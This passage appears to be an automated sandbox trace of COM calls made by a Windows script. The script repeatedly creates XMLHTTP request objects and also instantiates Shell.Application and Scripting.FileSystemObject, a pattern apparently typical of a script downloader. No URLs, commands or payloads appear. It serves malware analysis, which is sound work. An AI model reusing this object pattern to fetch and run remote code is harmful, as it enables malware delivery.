	[0390.536] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0390.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0390.536] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0390.536] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0390.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0390.536] ??2@YAPEAX_K@Z () returned 0x62f330
	[0390.536] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0390.536] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0390.536] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0390.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0390.536] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0390.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.537] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0390.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.537] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0390.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.700] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0390.700] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0390.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0390.701] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0390.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0390.701] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0390.701] SysStringLen (param_1=0x0) returned 0x0
	[0390.701] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0390.701] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0390.701] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0390.701] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0390.701] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0390.701] ??2@YAPEAX_K@Z () returned 0x62f350
	[0390.701] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0390.702] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0390.702] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0390.702] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0390.702] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0390.702] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0390.702] SysStringLen (param_1=0x0) returned 0x0
	[0390.702] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0390.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0390.704] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0390.704] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0390.705] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0390.705] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0390.705] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0391.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0391.196] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0391.196] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0391.197] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0391.197] SysStringLen (param_1=0x0) returned 0x0
	[0391.197] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0391.197] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0391.198] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0391.198] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0391.198] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0391.198] ??2@YAPEAX_K@Z () returned 0x62f330
	[0391.198] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0391.198] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0391.198] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0391.198] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0391.198] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0391.198] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.198] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0391.200] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0391.201] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0391.201] SysStringLen (param_1=0x0) returned 0x0
	[0391.201] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0391.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0391.201] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0391.201] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0391.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0391.201] ??2@YAPEAX_K@Z () returned 0x62f310
	[0391.201] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0391.201] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0391.201] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0391.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0391.201] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0391.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.201] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0391.202] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0391.202] SysStringLen (param_1=0x0) returned 0x0
	[0391.202] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0391.202] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0391.202] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0391.202] ??2@YAPEAX_K@Z () returned 0x62f330
	[0391.202] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0391.202] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0391.202] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0391.202] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0391.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0391.203] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0391.203] SysStringLen (param_1=0x0) returned 0x0
